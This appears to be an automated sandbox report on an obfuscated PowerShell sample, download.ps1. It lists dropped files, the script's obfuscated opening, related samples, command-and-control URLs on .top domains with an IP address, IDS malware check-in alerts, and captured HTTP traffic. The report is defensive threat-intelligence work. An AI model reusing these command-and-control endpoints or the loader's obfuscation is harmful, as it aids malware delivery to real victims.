                                                                                                              • Successful, ratio: 100%
                                                                                                              • Number of executed functions: 12
                                                                                                              • Number of non-executed functions: 3
                                                                                                              Cookbook Comments:
                                                                                                              • Found application associated with file extension: .ps1
                                                                                                              • Stop behavior analysis, all processes terminated
                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                                                                                              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 796 because it is empty
                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              TimeTypeDescription
                                                                                                              08:42:20API Interceptor51x Sleep call for process: powershell.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • kmaealcfcalhcac.top/ptiw51vm30htr.php?id=computer&key=74896207736&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • kmaealcfcalhcac.top/yu3de7qshbhtr.php?id=user-PC&key=118116829723&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • kmaealcfcalhcac.top/2xg70oiywchtr.php?id=computer&key=72557916474&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • kmaealcfcalhcac.top/36aol1ybpfhtr.php?id=computer&key=67225157272&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • kmaealcfcalhcac.top/n917uo0zpthtr.php?id=user-PC&key=103009180819&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • kmaealcfcalhcac.top/92fzsvy3ouhtr.php?id=user-PC&key=91940559182&s=527
                                                                                                              http://diebinjmajbkhhg.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                              • diebinjmajbkhhg.top/1.php?s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • jejmbadfmeenlnk.top/exikvouhlzhtr.php?id=computer&key=73195386263&s=527
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • jejmbadfmeenlnk.top/7zp8hc951fhtr.php?id=user-PC&key=47155048466&s=527
                                                                                                              No context
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              AS40676USn4eVpkRR3c.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 193.32.177.34
                                                                                                              n4eVpkRR3c.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 193.32.177.34
                                                                                                              CSHCBfpgKj.msiGet hashmaliciousUnknownBrowse
                                                                                                              • 193.32.177.34
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              download.ps1Get hashmaliciousUnknownBrowse
                                                                                                              • 45.61.136.138
                                                                                                              No context
                                                                                                              No context
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):19294
                                                                                                              Entropy (8bit):5.004171954222301
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIe3o+OdBNNXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhi3o+OdBNNZD
                                                                                                              MD5:B71BB846A6334D68E3579EB9223AF994
                                                                                                              SHA1:5C94BACA12D578694CC38165D2C78F92784362AE
                                                                                                              SHA-256:7CCE54604EBA4AD97801253698038447EF13A59EECCAAB5B96B623BC3C5D91D0
                                                                                                              SHA-512:05701DA2F82B81CEB194A4C3A262A9350A0B1E5AD510377EB8F9BFDB0A2E4A3FECA6A879915E93210133ED2F43898DDCFB45A91BD282E29646B74E8794A8D61E
                                                                                                              Malicious:false
                                                                                                              Reputation:low
                                                                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):64
                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:@...e...........................................................
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Reputation:high, very likely benign file
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6222
                                                                                                              Entropy (8bit):3.739415154465455
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:0U1tNn+C+GRgkvhkvCCtFTVIjAAqHqTVIjAAqHH:0U1jPKlVI0WVI0n
                                                                                                              MD5:FA22443E134917AC8201E3B1A0DF178E
                                                                                                              SHA1:27ABDB6233FBB276B8417B304D3E2F14DD347C8A
                                                                                                              SHA-256:6E21DF893D0853341161B8F30B6BD0BE00C87BA9E9575BEAE9585A1293CFC218
                                                                                                              SHA-512:36ABCDB0E309374988FF5E7CF23D40F1E3FC0609F8BA3E490F5BF47209F0A94623132D6EA96E90ECD9E82CB467B069C391880E7BC51A3590A74D3DA850125079
                                                                                                              Malicious:false
                                                                                                              Preview:...................................FL..................F.".. ...;.}.S.......e..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...p....e.......e......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.-Z@m....B......................A!.A.p.p.D.a.t.a...B.V.1.....-ZEm..Roaming.@......"S.-ZEm....D.....................U...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.-Z@m....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....-Z<=..Windows.@......"S.-Z@m....F.......................r.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`-Z.6....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`-Z.6....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.-Z.5....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.-ZKm....i...........
                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6222
                                                                                                              Entropy (8bit):3.739415154465455
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:0U1tNn+C+GRgkvhkvCCtFTVIjAAqHqTVIjAAqHH:0U1jPKlVI0WVI0n
                                                                                                              MD5:FA22443E134917AC8201E3B1A0DF178E
                                                                                                              SHA1:27ABDB6233FBB276B8417B304D3E2F14DD347C8A
                                                                                                              SHA-256:6E21DF893D0853341161B8F30B6BD0BE00C87BA9E9575BEAE9585A1293CFC218
                                                                                                              SHA-512:36ABCDB0E309374988FF5E7CF23D40F1E3FC0609F8BA3E490F5BF47209F0A94623132D6EA96E90ECD9E82CB467B069C391880E7BC51A3590A74D3DA850125079
                                                                                                              Malicious:false
                                                                                                              Preview:...................................FL..................F.".. ...;.}.S.......e..z.:{.............................:..DG..Yr?.D..U..k0.&...&........{.S...p....e.......e......t...CFSF..1....."S...AppData...t.Y^...H.g.3..(.....gVA.G..k...@......"S.-Z@m....B......................A!.A.p.p.D.a.t.a...B.V.1.....-ZEm..Roaming.@......"S.-ZEm....D.....................U...R.o.a.m.i.n.g.....\.1.....6S.T..MICROS~1..D......"S.-Z@m....E.......................(.M.i.c.r.o.s.o.f.t.....V.1.....-Z<=..Windows.@......"S.-Z@m....F.......................r.W.i.n.d.o.w.s.......1....."SN...STARTM~1..n.......S)`-Z.6....H...............D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....6S.S..Programs..j.......S)`-Z.6....I...............@.....f...P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1....."S....WINDOW~1..V......"S.-Z.5....J.......................O.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......"S.-ZKm....i...........
                                                                                                              File type:ASCII text, with very long lines (10626), with CRLF line terminators
                                                                                                              Entropy (8bit):5.968215631008647
                                                                                                              TrID:
                                                                                                                File name:download.ps1
                                                                                                                File size:19'971 bytes
                                                                                                                MD5:c7836e39d4ac41c592256e5a3a60ac3a
                                                                                                                SHA1:3d6becb61b9d5f6bf265c83a3e1fe88395ab53e4
                                                                                                                SHA256:ff335ed48532829555fd93efaa07c65ee2a150cf6971b59da9675f0ad310e158
                                                                                                                SHA512:faab6db4fb552078204225c56a6ea89564e68cac6dc103426f3a65d3a35c6639b2c6ffa5c08fe0c346cb8625b5ac7efc9b123c16fd43edff45cc112b2d98dffb
                                                                                                                SSDEEP:384:9b2OveqnScqs1NnxCtdNeHka4kriLzmRB8jx/VxKAPGIVHDBwz3EBZtRmTVHcn:9bJveqScqenxCtdNeHka4TKBGkAPhFm2
                                                                                                                TLSH:D6924CA1BB88ECD0C2D9C26A9556BC547F07751BE0EB28C5F755C4C263845C6AF8ACC1
                                                                                                                File Content Preview:$pexzbkvsa=$executioncontext;$tionarororatonenorisre = -join (0..54 | ForEach-Object {[char]([int]"000000760000007500000080000000730000007900000077000000790000007800000078000000730000007900000071000000720000007800000075000000790000007700000079000000790000
                                                                                                                Icon Hash:3270d6baae77db44

                                                                                                                Download Network PCAP: filteredfull

                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2025-01-13T14:42:40.011031+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.204975445.61.136.13880TCP
                                                                                                                2025-01-13T14:42:40.011031+01002057741ET MALWARE TA582 CnC Checkin1192.168.11.204975445.61.136.13880TCP
                                                                                                                2025-01-13T14:42:40.328923+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity2192.168.11.2049755142.251.167.14780TCP
                                                                                                                • Total Packets: 34
                                                                                                                • 80 (HTTP)
                                                                                                                • 53 (DNS)
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 13, 2025 14:42:22.882883072 CET4975480192.168.11.2045.61.136.138
                                                                                                                Jan 13, 2025 14:42:23.044764996 CET804975445.61.136.138192.168.11.20
                                                                                                                Jan 13, 2025 14:42:23.044995070 CET4975480192.168.11.2045.61.136.138
                                                                                                                Jan 13, 2025 14:42:23.047610998 CET4975480192.168.11.2045.61.136.138
                                                                                                                Jan 13, 2025 14:42:23.209364891 CET804975445.61.136.138192.168.11.20
                                                                                                                Jan 13, 2025 14:42:39.963748932 CET804975445.61.136.138192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.011030912 CET4975480192.168.11.2045.61.136.138
                                                                                                                Jan 13, 2025 14:42:40.070147038 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.177464962 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.177644968 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.177712917 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.283133030 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.328528881 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.328566074 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.328722000 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.328831911 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.328922987 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.328950882 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.328990936 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.329006910 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.329163074 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.329190016 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.329220057 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.329382896 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.329394102 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.329524040 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.329694986 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.434576988 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.434665918 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.434890032 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.438360929 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.438581944 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.438800097 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.446055889 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.446114063 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.446324110 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.454008102 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.454080105 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.454293966 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.463550091 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.463690996 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.463923931 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.471636057 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.471649885 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.471956015 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.476919889 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.476936102 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.477226019 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.484532118 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.484544992 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.484822989 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.492419004 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.492580891 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.493004084 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.501615047 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.501631975 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.501910925 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.540548086 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.540566921 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.540750980 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.544214964 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.544420004 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.544692039 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.551918030 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.551955938 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.552165985 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.558558941 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.558765888 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.559043884 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.565880060 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.565972090 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.566154003 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.571880102 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.572092056 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.572442055 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.578598022 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.578617096 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.578871012 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.585007906 CET8049755142.251.167.147192.168.11.20
                                                                                                                Jan 13, 2025 14:42:40.636074066 CET4975580192.168.11.20142.251.167.147
                                                                                                                Jan 13, 2025 14:42:40.766060114 CET4975480192.168.11.2045.61.136.138
                                                                                                                Jan 13, 2025 14:42:40.766693115 CET4975580192.168.11.20142.251.167.147
                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                Jan 13, 2025 14:42:22.639451027 CET5521453192.168.11.201.1.1.1
                                                                                                                Jan 13, 2025 14:42:22.875602007 CET53552141.1.1.1192.168.11.20
                                                                                                                Jan 13, 2025 14:42:39.967614889 CET6363253192.168.11.201.1.1.1
                                                                                                                Jan 13, 2025 14:42:40.069061995 CET53636321.1.1.1192.168.11.20
                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Jan 13, 2025 14:42:22.639451027 CET192.168.11.201.1.1.10x27f9Standard query (0)lggknhaffleahbh.topA (IP address)IN (0x0001)false
                                                                                                                Jan 13, 2025 14:42:39.967614889 CET192.168.11.201.1.1.10xd051Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Jan 13, 2025 14:42:22.875602007 CET1.1.1.1192.168.11.200x27f9No error (0)lggknhaffleahbh.top45.61.136.138A (IP address)IN (0x0001)false
                                                                                                                Jan 13, 2025 14:42:40.069061995 CET1.1.1.1192.168.11.200xd051No error (0)www.google.com142.251.167.147A (IP address)IN (0x0001)false
                                                                                                                Jan 13, 2025 14:42:40.069061995 CET1.1.1.1192.168.11.200xd051No error (0)www.google.com142.251.167.103A (IP address)IN (0x0001)false
                                                                                                                Jan 13, 2025 14:42:40.069061995 CET1.1.1.1192.168.11.200xd051No error (0)www.google.com142.251.167.106A (IP address)IN (0x0001)false
                                                                                                                Jan 13, 2025 14:42:40.069061995 CET1.1.1.1192.168.11.200xd051No error (0)www.google.com142.251.167.105A (IP address)IN (0x0001)false
                                                                                                                Jan 13, 2025 14:42:40.069061995 CET1.1.1.1192.168.11.200xd051No error (0)www.google.com142.251.167.99A (IP address)IN (0x0001)false
                                                                                                                Jan 13, 2025 14:42:40.069061995 CET1.1.1.1192.168.11.200xd051No error (0)www.google.com142.251.167.104A (IP address)IN (0x0001)false
                                                                                                                • lggknhaffleahbh.top
                                                                                                                • www.google.com
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.11.204975445.61.136.13880796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 13, 2025 14:42:23.047610998 CET215OUTGET /ay3cmf8whbhtr.php?id=computer&key=12150337984&s=527 HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                Host: lggknhaffleahbh.top
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 13, 2025 14:42:39.963748932 CET166INHTTP/1.1 302 Found
                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                Date: Mon, 13 Jan 2025 13:42:39 GMT
                                                                                                                Content-Length: 0
                                                                                                                Connection: keep-alive
                                                                                                                Location: http://www.google.com


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.11.2049755142.251.167.14780796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 13, 2025 14:42:40.177712917 CET159OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                                Host: www.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 13, 2025 14:42:40.328528881 CET1289INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 13 Jan 2025 13:42:40 GMT
                                                                                                                Expires: -1
                                                                                                                Cache-Control: private, max-age=0
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-xVDzvk8GwYgiK_lQLJ8ABg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                Server: gws
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                Set-Cookie: AEC=AZ6Zc-W1x2YRtOOtDKaXiS98ILh61grk9DLgh3LBH9_DGyD6NmS7nn6qodM; expires=Sat, 12-Jul-2025 13:42:40 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                Set-Cookie: NID=520=W8fkFlDInUY8fLItRsSURiVjAg64AjPq5-2zD7pmV2eE7adq8oqhpIFZ5m7DTsWLI5gYDX1lliembPxJJ8zEz1SbkOSo7UmmxVxQE9nnumy3IQdb1LmOBunuylp77R25fURYAfYJwY3zyRflHewVNMopVsurv6cMoMU7vf0oDmOfcBa9GFVfPbpqJR3HDu34-weT-qSpuH4UCrE93g; expires=Tue, 15-Jul-2025 13:42:40 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                Accept-Ranges: none
                                                                                                                Vary: Accept-Encoding
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Data Raw: 35 37 36 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65
